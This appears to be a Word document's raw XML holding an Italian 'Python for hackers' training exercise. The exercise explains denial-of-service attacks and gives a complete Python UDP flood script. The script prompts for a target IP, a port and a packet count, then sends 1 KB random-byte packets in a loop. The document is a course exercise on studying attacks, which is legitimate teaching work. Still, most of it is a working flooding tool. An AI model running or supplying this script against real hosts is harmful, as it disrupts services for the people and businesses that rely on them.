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36AF" w14:textId="14135D79" w:rsidR="001C3E72" w:rsidRDefault="001C3E72">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C3E72">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Traccia: Esercizio Python per Hacker Gli attacchi di tipo Dos, ovvero denial of services, mirano a saturare le richieste di determinati servizi rendendoli così indisponibili con conseguenti impatti sul business delle aziende. L’esercizio di oggi è scrivere un programma in Python che simuli un UDP flood, ovvero l’invio massivo di richieste UDP verso una macchina target che è in ascolto su una porta UDP casuale.  Requisiti: ● Il programma deve richiedere l’inserimento dell’IP target. ● Il programma deve richiedere l’inserimento della porta target. ● La grandezza dei pacchetti da inviare è di 1 KB per pacchetto ● Suggerimento: per costruire il pacchetto da 1KB potete utilizzare il modulo «random» per la generazione di byte casuali. ● Il programma deve chiedere all’utente quanti pacchetti da 1 KB inviare.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC9B85D" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B2B7A7" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t>import random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3C62C6" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRPr="001C3E72" w:rsidRDefault="001C3E72" w:rsidP="001C3E72">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A62F5B" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t>def generate_random_packet(size):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20737F57" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t xml:space="preserve">    return random.randbytes(size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E8F8D0" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRPr="001C3E72" w:rsidRDefault="001C3E72" w:rsidP="001C3E72">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499DEC9F" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t>def udp_flood(target_ip, target_port, num_packets):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8B7E48" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t xml:space="preserve">    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647866EC" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t xml:space="preserve">    packet_size = 1024  # 1 KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A11529C" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t xml:space="preserve">    packet = generate_random_packet(packet_size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B1393" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRPr="001C3E72" w:rsidRDefault="001C3E72" w:rsidP="001C3E72">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294AAD45" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t xml:space="preserve">    for _ in range(num_packets):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E5F2C1" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t xml:space="preserve">        sock.sendto(packet, (target_ip, target_port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009EA2EB" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t xml:space="preserve">        print(f'Sent packet to {target_ip}:{target_port}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DCCBD0" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRPr="001C3E72" w:rsidRDefault="001C3E72" w:rsidP="001C3E72">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1183DE7B" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t>def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFAD38D" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t xml:space="preserve">    target_ip = input("Enter target IP address: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53928AE8" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t xml:space="preserve">    target_port = int(input("Enter target port: "))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E7D972" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t xml:space="preserve">    num_packets = int(input("Enter number of packets to send: "))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548DCB38" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRPr="001C3E72" w:rsidRDefault="001C3E72" w:rsidP="001C3E72">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EBA1742" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t xml:space="preserve">    udp_flood(target_ip, target_port, num_packets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B18BE" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRPr="001C3E72" w:rsidRDefault="001C3E72" w:rsidP="001C3E72">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E90FBBA" w14:textId="77777777" w:rsidR="001C3E72" w:rsidRP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t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F82AE" w14:textId="730EAF7A" w:rsid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t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156ED0F6" w14:textId="6259BED4" w:rsidR="001C3E72" w:rsidRPr="001C3E72" w:rsidRDefault="001C3E72" w:rsidP="001C3E72">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C3E72">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Questo comando invierà 1000 pacchetti di 1 KB ciascuno al dispositivo con IP 192.168.1.100 sulla porta 8080</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001C3E72" w:rsidRPr="001C3E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72"/>
    <w:rsid w:val="001C3E72"/>
    <w:rsid w:val="002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91E7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B66ACD44-08B2-4EDB-9AB6-F9A39B9D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Spallone</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Steven Spallone</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-14T09:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-14T09:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>